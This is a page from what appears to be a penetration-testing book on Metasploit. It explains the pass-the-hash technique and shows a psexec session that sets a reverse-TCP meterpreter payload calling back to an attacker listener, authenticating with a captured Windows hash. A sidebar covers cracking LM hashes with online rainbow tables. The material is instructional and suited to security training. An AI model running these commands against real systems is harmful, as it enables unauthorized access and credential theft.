background image

84

Chapter 6

was longer than 14 characters, Windows can no longer store an LM hash, and 
it uses the standard 

aad3b435 . . .

 string, which represents a blank password.

Pass the Hash

In the preceding example, we ran into a slight complication: We have the 
administrator’s username and password hashes, but we can’t crack the pass-
word in a reasonable time frame. If we don’t know the password, how can we 
log into additional machines and potentially compromise more systems with 
this one user account?

We can use the 

pass-the-hash

 technique, which requires that we have only 

the password hash, not the password itself. Metasploit’s 

windows/smb/psexec

 

module makes this all possible, as shown here:

msf> 

use windows/smb/psexec

 

msf exploit(psexec)> 

set PAYLOAD windows/meterpreter/reverse_tcp

payload => windows/meterpreter/reverse_tcp
msf exploit(psexec)> 

set LHOST 192.168.33.129

LHOST => 192.168.33.129
msf exploit(psexec)> 

set LPORT 443

LPORT => 443
msf exploit(psexec)> 

set RHOST 192.168.33.130

RHOST => 192.168.33.130

. . . SNIP . . .

msf exploit(psexec)> 

set SMBPass  

aad3b435b51404eeaad3b435b51404ee:b75989f65d1e04af7625ed712ac36c29

 

SMBPass => aad3b435b51404eeaad3b435b51404ee:b75989f65d1e04af7625ed712ac36c29
msf exploit(psexec)> 

exploit

[*] Connecting to the server...
[*] Started reverse handler
[*] Authenticating as user 'Administrator'...

T H E   P R O B L E M   W I T H   L M   H A S H E S

Just for fun, try the following: Change your password to something complex that is 
14 characters or less. Then extract the password hashes from the system with 

hashdump

 

and copy the first hash value (such as the portion beginning with 

aad3b435

 in the 

preceding example), which is the LM hash. Next, search for one of the many online 
password crackers and submit your hash value. Wait a few minutes, click the refresh 
button a couple of times, and your password should be cracked. (Be careful not to use 
one of your real passwords, because the information is frequently posted to everyone 
who visits the site!)

This is a 

rainbow table

 attack. A 

rainbow table

 is a precomputed table used for 

reversing cryptographic hash functions, usually for cracking passwords. Rainbow 
tables use every combination of characters including 1–7, a–z, special symbols, and 
spaces. When you submit your hash to an online cracker, the site’s server searches 
through gigabytes of rainbow tables for your specific hash.